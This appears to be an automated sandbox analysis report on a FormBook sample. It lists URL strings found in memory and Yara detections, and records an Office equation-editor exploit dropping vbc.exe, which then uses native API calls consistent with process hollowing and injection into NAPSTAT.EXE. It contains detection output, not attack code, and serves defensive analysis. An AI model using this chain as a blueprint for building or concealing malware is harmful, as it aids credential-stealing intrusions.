Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2094118095.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.2101707884.000000000839A000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2094304052.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: explorer.exe, 00000006.00000000.2102194085.000000000856E000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 00000006.00000000.2094118095.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 00000006.00000000.2102099467.0000000008471000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00220110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,ExitProcess,		4_2_00220110
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004181C0 NtCreateFile,		5_2_004181C0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00418270 NtReadFile,		5_2_00418270
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004182F0 NtClose,		5_2_004182F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004183A0 NtAllocateVirtualMemory,		5_2_004183A0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004181BA NtCreateFile,		5_2_004181BA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041826A NtReadFile,		5_2_0041826A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004182EB NtClose,		5_2_004182EB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008E00C4 NtCreateFile,LdrInitializeThunk,		5_2_008E00C4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008E0048 NtProtectVirtualMemory,LdrInitializeThunk,		5_2_008E0048
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008E0078 NtResumeThread,LdrInitializeThunk,		5_2_008E0078
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008E07AC NtCreateMutant,LdrInitializeThunk,		5_2_008E07AC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DF9F0 NtClose,LdrInitializeThunk,		5_2_008DF9F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DF900 NtReadFile,LdrInitializeThunk,		5_2_008DF900
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		5_2_008DFAD0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFAE8 NtQueryInformationProcess,LdrInitializeThunk,		5_2_008DFAE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFBB8 NtQueryInformationToken,LdrInitializeThunk,		5_2_008DFBB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFB68 NtFreeVirtualMemory,LdrInitializeThunk,		5_2_008DFB68
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFC90 NtUnmapViewOfSection,LdrInitializeThunk,		5_2_008DFC90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFC60 NtMapViewOfSection,LdrInitializeThunk,		5_2_008DFC60
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFD8C NtDelayExecution,LdrInitializeThunk,		5_2_008DFD8C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFDC0 NtQuerySystemInformation,LdrInitializeThunk,		5_2_008DFDC0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFEA0 NtReadVirtualMemory,LdrInitializeThunk,		5_2_008DFEA0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		5_2_008DFED0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFFB4 NtCreateSection,LdrInitializeThunk,		5_2_008DFFB4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008E10D0 NtOpenProcessToken,		5_2_008E10D0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008E0060 NtQuerySection,		5_2_008E0060
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008E01D4 NtSetValueKey,		5_2_008E01D4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008E010C NtOpenDirectoryObject,		5_2_008E010C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008E1148 NtOpenThread,		5_2_008E1148
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DF8CC NtWaitForSingleObject,		5_2_008DF8CC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DF938 NtWriteFile,		5_2_008DF938
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008E1930 NtSetContextThread,		5_2_008E1930
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFAB8 NtQueryValueKey,		5_2_008DFAB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFA20 NtQueryInformationFile,		5_2_008DFA20
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFA50 NtEnumerateValueKey,		5_2_008DFA50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFBE8 NtQueryVirtualMemory,		5_2_008DFBE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFB50 NtCreateKey,		5_2_008DFB50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFC30 NtOpenProcess,		5_2_008DFC30
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFC48 NtSetInformationFile,		5_2_008DFC48
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008E0C40 NtGetContextThread,		5_2_008E0C40
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008E1D80 NtSuspendThread,		5_2_008E1D80
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFD5C NtEnumerateKey,		5_2_008DFD5C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFE24 NtWriteVirtualMemory,		5_2_008DFE24
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFFFC NtCreateProcessEx,		5_2_008DFFFC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFF34 NtQueueApcThread,		5_2_008DFF34
Source: C:\Users\Public\vbc.exe	Code function: 5_1_004181C0 NtCreateFile,		5_1_004181C0
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00418270 NtReadFile,		5_1_00418270
Source: C:\Users\Public\vbc.exe	Code function: 5_1_004182F0 NtClose,		5_1_004182F0
Source: C:\Users\Public\vbc.exe	Code function: 5_1_004183A0 NtAllocateVirtualMemory,		5_1_004183A0
Source: C:\Users\Public\vbc.exe	Code function: 5_1_004181BA NtCreateFile,		5_1_004181BA
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041826A NtReadFile,		5_1_0041826A
Source: C:\Users\Public\vbc.exe	Code function: 5_1_004182EB NtClose,		5_1_004182EB
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_023400C4 NtCreateFile,LdrInitializeThunk,		7_2_023400C4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_023407AC NtCreateMutant,LdrInitializeThunk,		7_2_023407AC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233FAB8 NtQueryValueKey,LdrInitializeThunk,		7_2_0233FAB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233FAE8 NtQueryInformationProcess,LdrInitializeThunk,		7_2_0233FAE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		7_2_0233FAD0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233FB68 NtFreeVirtualMemory,LdrInitializeThunk,		7_2_0233FB68
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233FB50 NtCreateKey,LdrInitializeThunk,		7_2_0233FB50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233FBB8 NtQueryInformationToken,LdrInitializeThunk,		7_2_0233FBB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233F900 NtReadFile,LdrInitializeThunk,		7_2_0233F900
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233F9F0 NtClose,LdrInitializeThunk,		7_2_0233F9F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		7_2_0233FED0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233FFB4 NtCreateSection,LdrInitializeThunk,		7_2_0233FFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233FC60 NtMapViewOfSection,LdrInitializeThunk,		7_2_0233FC60
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233FD8C NtDelayExecution,LdrInitializeThunk,		7_2_0233FD8C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233FDC0 NtQuerySystemInformation,LdrInitializeThunk,		7_2_0233FDC0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_02340078 NtResumeThread,		7_2_02340078
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_02340060 NtQuerySection,		7_2_02340060
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_02340048 NtProtectVirtualMemory,		7_2_02340048
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_023410D0 NtOpenProcessToken,		7_2_023410D0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0234010C NtOpenDirectoryObject,		7_2_0234010C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_02341148 NtOpenThread,		7_2_02341148
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_023401D4 NtSetValueKey,		7_2_023401D4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233FA20 NtQueryInformationFile,		7_2_0233FA20
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233FA50 NtEnumerateValueKey,		7_2_0233FA50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233FBE8 NtQueryVirtualMemory,		7_2_0233FBE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233F8CC NtWaitForSingleObject,		7_2_0233F8CC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_02341930 NtSetContextThread,		7_2_02341930
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233F938 NtWriteFile,		7_2_0233F938
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233FE24 NtWriteVirtualMemory,		7_2_0233FE24
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233FEA0 NtReadVirtualMemory,		7_2_0233FEA0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233FF34 NtQueueApcThread,		7_2_0233FF34
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233FFFC NtCreateProcessEx,		7_2_0233FFFC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233FC30 NtOpenProcess,		7_2_0233FC30
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_02340C40 NtGetContextThread,		7_2_02340C40
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233FC48 NtSetInformationFile,		7_2_0233FC48
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233FC90 NtUnmapViewOfSection,		7_2_0233FC90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0233FD5C NtEnumerateKey,		7_2_0233FD5C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_02341D80 NtSuspendThread,		7_2_02341D80
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_000981C0 NtCreateFile,		7_2_000981C0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00098270 NtReadFile,		7_2_00098270
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_000982F0 NtClose,		7_2_000982F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_000983A0 NtAllocateVirtualMemory,		7_2_000983A0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_000981BA NtCreateFile,		7_2_000981BA
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0009826A NtReadFile,		7_2_0009826A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_000982EB NtClose,		7_2_000982EB

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0023E05A		4_2_0023E05A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0022A1FB		4_2_0022A1FB
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0022A200		4_2_0022A200
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0023DA6F		4_2_0023DA6F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0023CAA2		4_2_0023CAA2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0023D2CF		4_2_0023D2CF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00224327		4_2_00224327
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00224330		4_2_00224330
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00224550		4_2_00224550
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002225D0		4_2_002225D0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00222714		4_2_00222714
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401030		5_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401174		5_2_00401174
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041CABA		5_2_0041CABA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00408C5B		5_2_00408C5B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00408C60		5_2_00408C60
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C4CF		5_2_0041C4CF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041BD5B		5_2_0041BD5B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B502		5_2_0041B502
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D87		5_2_00402D87
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D90		5_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402FB0		5_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EE0C6		5_2_008EE0C6
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0091D005		5_2_0091D005
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090905A		5_2_0090905A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F3040		5_2_008F3040
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EE2E9		5_2_008EE2E9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00991238		5_2_00991238
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EF3CF		5_2_008EF3CF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009163DB		5_2_009163DB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F2305		5_2_008F2305
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F7353		5_2_008F7353
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0093A37B		5_2_0093A37B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00925485		5_2_00925485
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00901489		5_2_00901489
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0092D47D		5_2_0092D47D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090C5F0		5_2_0090C5F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F351F		5_2_008F351F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00936540		5_2_00936540
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F4680		5_2_008F4680
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008FE6C1		5_2_008FE6C1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00992622		5_2_00992622
